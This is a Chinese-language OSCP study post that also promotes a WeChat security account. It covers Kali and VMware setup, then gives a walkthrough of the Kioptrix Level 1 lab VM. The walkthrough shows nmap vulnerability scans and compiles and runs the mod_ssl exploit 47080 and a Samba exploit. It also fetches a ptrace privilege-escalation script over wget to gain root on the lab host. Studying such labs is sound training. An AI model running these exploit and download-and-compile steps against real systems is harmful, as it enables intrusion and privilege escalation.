学前补充-在线学习资源
国内中文资料
国内虽然网络安全学习资源逐渐丰富,但在涉及 OSCP 等国际认证时,中文资料相对较少,更多的仍需依赖官方英文资料。然而,我们可以通过一些中文平台获取相关的学习内容,并帮助更好地理解渗透测试和网络安全的基本概念。
泷羽Sec公众号:关注 泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。
CSDN 泷羽Sec-静安栏目:同样可以通过 CSDN 泷羽Sec-静安 账号找到关于 OSCP 考试、渗透测试工具等内容的详细教程,适合进行技术深度学习。
扫描下方二维码,马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
拓展国外资料
虽然国内资料主要依赖翻译或二次加工,但国外的资料更为丰富,尤其是针对渗透测试和 OSCP 考试的内容。建议你结合以下资源,深入学习并拓宽视野。无需完全掌握所有内容,但这些资料可以帮助你更好地理解考试大纲之外的技术点。
YouTube 渗透测试教程:
Offensive Security 官方资源:
OffSec Discord 群组:加入 OffSec 的 Discord 群,这是一个全球渗透测试爱好者和专业人员的聚集地,群内每周五会有免费直播,大家可以实时互动并提问。通过参与群组,你不仅能获得最新的培训信息,还有机会向其他 OSCP 备考者和认证过的专家请教问题。
OffSec 官方 YouTube 频道:OffSec 官方 YouTube 频道,官方会不定期更新关于渗透测试技巧、OSCP 备考心得等内容。特别适合在考试前复习并加深理解。
OffSec 官方 Twitch 频道:OffSec 官方 Twitch 频道:在这里你可以找到各种实时和过往的直播视频,包括渗透测试实战演示和技术讲解。定期观看这些直播,能够帮助你更好地理解渗透测试的实际操作,并获取最新的行业动态和实践技巧。
翻译软件使用
对于非英语母语的学习者,翻译软件可以极大地帮助理解英文资料,特别是一些技术性的讲解。以下是推荐的两款翻译工具,帮助提升学习效率:
- 适用于翻译在线网页文档,特别是技术博客、教程页面等。这个工具支持将 YouTube 上的视频字幕实时翻译,便于理解外语讲解的内容,尤其是对于英语不太熟练的学习者来说,是一个非常有用的工具。
讯飞同传:
- 这个工具非常适合观看一些沉浸式翻译不支持的视频,以及在后期与考试官的实时互动中使用。它可以帮助你实时将英语对话翻译成中文,并支持与考官之间的流畅交流。这对于 OSCP 考试时的实时沟通(例如,考试过程中需要与考官确认某些细节时)尤为重要。
通过这些工具,你可以在学习过程中克服语言障碍,更轻松地掌握 OSCP 考试的内容,尤其是在遇到复杂的技术概念或英文资料时,翻译软件将成为你学习的得力助手。
学习 OSCP 不仅需要掌握官方教材大纲的内容,更需要拓展视野,借助国内外的学习资源和翻译工具,提高自己的渗透测试能力。建议大家从 泷羽Sec-静安 公众号获取最新的学习资讯,结合国内外的视频教程和在线社区的互动,逐步完成 OSCP 认证的备考旅程。
Kali下载、VMware安装和镜像启动
Kali Linux由Offensive Security开发、资助和维护,是一个基于Debian的Linux发行版,专为高级渗透测试和安全审计设计。它集成了数百种信息安全工具,支持渗透测试、安全研究、计算机取证、逆向工程等多种任务。
Kali 下载
kali 官网下载地址:https://www.kali.org/get-kali/#kali-platforms
1 Get-FileHash .\kali-linux-2024.4-vmware-amd64.7z -Algorithm SHA256
验证下载文件
VMware下载
VMware是一家领先的虚拟化和云计算技术公司,专注于提供企业级解决方案。其核心产品包括虚拟化平台、云管理和自动化工具,旨在帮助企业优化IT基础设施,提升运维效率。VMware的技术广泛应用于数据中心、桌面虚拟化、网络安全和应用开发等领域,推动了云计算、容器化和企业数字化转型的进程。
VMware 官网下载:https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion
下载安装后,激活网上找教程激活即可。2024年5月后Workstation 和 Fusion 对个人使用完全免费,企业许可转向订阅,个人用户也可以使用免费版。关注公众号泷羽Sec-静安,后台回复找工具+Day2获取镜像和相关软件。
镜像启动
在Vmware中点击打开虚拟机,选择下载好的kali镜像(解压一下),选择文件夹下的.vmx文件即可。点击启动即可。
1默认用户名:kali
2默认密码:kali
可以通过passwd命令修改账户密码,但是学习阶段不建议,就一个虚拟机,省得后面复杂操作的时候记不得。
常用网站链接
- kali全套官方工具包详解 https://www.kali.org/tools/all-tools/
- kali 官方文档手册 https://www.kali.org/docs/
- kali官方论坛 https://forums.kali.org/官方建议,发帖之前先阅读论坛规则和向导,不合规的帖子可能被忽略
- kali bug自助页面 https://bugs.kali.org
- 官方kali解密书籍:《Kali Linux Revealed: mastering the penetration testing distribution》关注公众号
泷羽Sec-静安后台回复找书+KLR获取下载链接
kali换源和新装机设置
1sudo -s
2vim /etc/apt/sources.list
1# 清华大学Kali镜像源
2
3deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free non-free-firmware
4deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free non-free-firmware
复制上面的内容,按I键进入插入模式,插入到list文件中,注释原来的kali官方源,按ESC退出编辑模式,然后按:wq保存并退出。更多详细vim命令请参考菜鸟 Linux vi/vim,vimtutor和vim官方,或在终端输入vimtutor查看官方指南。
然后在终端中更新镜像源并升级软件包。注意看源是否已经换成清华源。若你的网络对于清华源还是慢,可以参考Kali 2024更换源(超详细,附国内优质镜像源地址)_kali换源选择其他源。更新升级会占用大量时间,但这是必须的。
1apt update
2apt upgrade
安装或更新完成后,会遗留一些软件的安装包,会占用部分硬盘空间,可使用下面的命令来对其进行清理
1apt-get clean
设置锁屏时间为从不
不然经常切换应用后要输入kali:kali登录。左键点击电池图标,选择设置,找到安全性,设置锁屏时间为从不(never)
配置ssh服务
输入命令:vim /etc/ssh/sshd_config
将下面的命令改为yes
1PasswordAuthentication yes 密码验证改为yes
输入命令:service ssh start 开启ssh服务
输入命令:update-rc.d ssh enable 设置为开机自启动
不要忘记 reboot (重启kali虚拟机)
这样你就可以在虚拟机以外利用shell软件进行远程的访问。方便复制粘贴一些命令,有时候在kali中复制粘贴会有问题,然后就是截屏不方便。
我个人是喜欢使用MobaXterm来作为我的shell而不是默认终端。关注公众号泷羽Sec-静安,后台回复找工具+Day2获取镜像和相关软件。先在原本的kali中输入ifconfig查看kali的网段,然后从mobaXterm中连接ssh登录kali即可。
汉化
我的建议是没有必要汉化,因为目前很多OSCP的资料还是英文的比较权威,汉化后不一定能一步一步找着英文教材对应的软件名字,还有一些细节的按钮。但是如果你实在觉得看着英文难受,觉得中文界面学习更方便的话,可以使用dpkg-reconfigure locales命令选择按照汉化,然后重启,重启后会有提示框询问是否修改文件夹语言,记得一定要选择否,保留旧的英文名称,因为有一些安全工具,不支持中文路径,与其后期麻烦的改来改去纠结路径问题,不如全部保留英文路径。也建议在之后的学习中,保持起英文文件夹名字的习惯,用英文也好用拼音也好,总之要是英文字母的文件名。
至此,一个基本的好用的Kali已经设置完毕,可以开始靶机练习了。
Kioptix Level 1 练习
Nmap扫描
输入ifconfig查看kali本机的网段。
输入 nmap -sn kali的ip/24探查网段,实战过程是通过vpn链接,进去后能查看网段。或 nmap -p- kali的ip/24探查所有网段。
可以发现129有一个80端口,在kali浏览器中访问可以看到如下界面:
接下来探查端口指纹
1 nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-al
然后用漏洞扫描
1nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln
得到输出
1┌──(kali㉿kali)-[~]
2└─$ nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln
3Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 22:14 EST
4Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
5NSE Timing: About 0.00% done
6Nmap scan report for 192.168.139.129
7Host is up (0.00025s latency).
8
9PORT STATE SERVICE
1022/tcp open ssh
1180/tcp open http
12|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
13|_http-csrf: Couldn't find any CSRF vulnerabilities.
14|_http-dombased-xss: Couldn't find any DOM based XSS.
15|_http-trace: TRACE is enabled
16| http-enum:
17| /test.php: Test page
18| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
19| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
20|_ /usage/: Potentially interesting folder
21111/tcp open rpcbind
22139/tcp open netbios-ssn
23443/tcp open https
24|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
25| ssl-poodle:
26| VULNERABLE:
27| SSL POODLE information leak
28| State: VULNERABLE
29| IDs: CVE:CVE-2014-3566 BID:70574
30| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
31| products, uses nondeterministic CBC padding, which makes it easier
32| for man-in-the-middle attackers to obtain cleartext data via a
33| padding-oracle attack, aka the "POODLE" issue.
34| Disclosure date: 2014-10-14
35| Check results:
36| TLS_RSA_WITH_3DES_EDE_CBC_SHA
37| References:
38| https://www.imperialviolet.org/2014/10/14/poodle.html
39| https://www.openssl.org/~bodo/ssl-poodle.pdf
40| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
41|_ https://www.securityfocus.com/bid/70574
42|_http-csrf: Couldn't find any CSRF vulnerabilities.
43| ssl-dh-params:
44| VULNERABLE:
45| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
46| State: VULNERABLE
47| IDs: CVE:CVE-2015-4000 BID:74733
48| The Transport Layer Security (TLS) protocol contains a flaw that is
49| triggered when handling Diffie-Hellman key exchanges defined with
50| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
51| to downgrade the security of a TLS session to 512-bit export-grade
52| cryptography, which is significantly weaker, allowing the attacker
53| to more easily break the encryption and monitor or tamper with
54| the encrypted stream.
55| Disclosure date: 2015-5-19
56| Check results:
57| EXPORT-GRADE DH GROUP 1
58| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
59| Modulus Type: Safe prime
60| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
61| Modulus Length: 512
62| Generator Length: 8
63| Public Key Length: 512
64| References:
65| https://www.securityfocus.com/bid/74733
66| https://weakdh.org
67| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
68|
69| Diffie-Hellman Key Exchange Insufficient Group Strength
70| State: VULNERABLE
71| Transport Layer Security (TLS) services that use Diffie-Hellman groups
72| of insufficient strength, especially those using one of a few commonly
73| shared groups, may be susceptible to passive eavesdropping attacks.
74| Check results:
75| WEAK DH GROUP 1
76| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
77| Modulus Type: Safe prime
78| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
79| Modulus Length: 1024
80| Generator Length: 8
81| Public Key Length: 1024
82| References:
83|_ https://weakdh.org
84|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
85| ssl-ccs-injection:
86| VULNERABLE:
87| SSL/TLS MITM vulnerability (CCS Injection)
88| State: VULNERABLE
89| Risk factor: High
90| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
91| does not properly restrict processing of ChangeCipherSpec messages,
92| which allows man-in-the-middle attackers to trigger use of a zero
93| length master key in certain OpenSSL-to-OpenSSL communications, and
94| consequently hijack sessions or obtain sensitive information, via
95| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
96|
97| References:
98| http://www.cvedetails.com/cve/2014-0224
99| http://www.openssl.org/news/secadv_20140605.txt
100|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
101|_http-dombased-xss: Couldn't find any DOM based XSS.
102|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
1031024/tcp open kdm
104MAC Address: 00:0C:29:3B:F8:BB (VMware)
105
106Host script results:
107|_smb-vuln-ms10-054: false
108| smb-vuln-cve2009-3103:
109| VULNERABLE:
110| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
111| State: VULNERABLE
112| IDs: CVE:CVE-2009-3103
113| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
114| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
115| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
116| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
117| aka "SMBv2 Negotiation Vulnerability."
118|
119| Disclosure date: 2009-09-08
120| References:
121| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
122|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
123|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
124|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
125
126Nmap done: 1 IP address (1 host up) scanned in 333.53 seconds
目录扫描
从Nmap扫描的结果来看,它提示以下几个文件目录,可能有洞。
使用如下命令扫描目录
1dirb http://192.168.139.129/
看一圈泄露的目录后发现mod_ssl目录下似乎提示此漏洞可利用(靶机会这样提示,实战要自己猜自己挖)。且从之前的Nmap扫描结果中看出,SSL存在漏洞。
SSL漏洞利用 80/443端口
Kali终端中输入以下命令,查找可用的攻击方式。
1searchsploit mod_ssl
根据之前Nmap扫描的版本信息选择对应的攻击方式。可用的几个方式都试一遍。下载攻击方式,如果下载文件有损坏,可以到 https://www.exploit-db.com/ 网站下载对应源码。
1searchsploit -m 47080.c
2sudo apt-get install libssl-dev # 安装依赖环境
3gcc -o ssl47080 47080.c -lcrypto # 编译源码
1 ./ssl47080 |grep "1.3.20"
筛选符合 Apache 1.3.20版本的工具
靶机系统是RedHat,所以使用0x6a或0x6b。
0x6a测试失败,改用0x6b,输入以下命令:
1./ssl47080 0x6b 192.168.139.129 -c 40
提权为root
目前是使用apache账户登录shell,这个账户是用于apache服务的专用账户, 可以使用ls /bin查看目前账户可以使用的命令,可以发现只能使用一些基本命令,权限较低,我们想要完整的shell就要root账户,就要提权。
现在本地攻击机下面下载提权脚本。
1wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
然后开启一个简单的http服务,提供给靶机用于下载提权脚本。
1sudo python -m http.server 80
这个靶机好在可以使用wget命令下载提权脚本。如果wget用不了的情况,可以尝试用curl或ftp下载脚本。然后从之前47080进去的Apache账户的shell里运行以下命令:
1wget http://192.168.139.128/ptrace-kmod.c
退出,然后再次重连,自动编译,就会获得root权限。如果重连后不是root,可以多试几次,或者更换47080.c文件。
另一种提权的方式:
(CVE-2003-0651)Apache RCE
https://www.cnblogs.com/wsec/p/vulnhub0x01.html#3cve-2003-0651apache-rce
这个67.c文件最好从网站下载,kali里下载的不全。尾号305的才是正确的文件。
- 但是编译不出来。
Samba 漏洞利用139端口
https://medium.com/@MarkdeMoras/kioptrix-level-1-1-vulnhub-walkthrough-by-mark-de-moras-147002cc4853
除了ssl漏洞,可以从之前的Nmap扫描结果发现也存在Samba漏洞。
使用Nmap再次扫描靶机的网址。
1 nmap -A -p- -T4 192.168.139.129
使用msf工具箱
1msfconsole
2search scanner/smb
3use 16
4info
5set RHOST 192.168.139.129
这样就获取了samba的版本,退出msf,然后搜索samba的攻击方式,选择对应版本。下载,编译。
1searchsploit samba 2.2.1a
2searchsploit -m multiple/remote/10.c
3gcc -o Samba 10.c
查看使用方式
使用如下命令爆破进入,直接获得root权限。
1./Samba -b 0 192.168.139.129
Samba缓存漏洞利用139端口
搜索通用版本的samba攻击方式,发现,还有例如“call_trans2open”远程缓冲区溢出(2)漏洞利用的方式。下载编译后查看使用方式。
rpcbind 尝试
漏洞扫描的结果中还有111端口和1024端口的rpcbind服务,搜索了有如下方法,但是尝试失败。
上面这篇文章也做过了尝试是失败的,所以rpc的漏洞就不尝试了。
总结
找漏洞渗透的步骤:
Nmap 扫可能的漏洞和端口
1nmap -sn kali的ip/24 2nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-al 3nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vulndirb扫目录
观察可能的端口和应用
searchsploit 和msf搜索可用的攻击载荷
1searchsploit xxx 2searchsploit -m 67.c 3--- 4msfconsole 5search xxx 6use 编号 7info 8set Rhost 192.168.139.129 9run根据版本选择poc,编译,调试,打!
关注公众号泷羽Sec-静安,后台回复找工具+Day2获取镜像和相关软件及POC。
🔔 想要获取更多网络安全与编程技术干货?
关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻
扫描下方二维码,马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
或者直接回复文章中的关键词,获取更多技术资料与书单推荐!📚
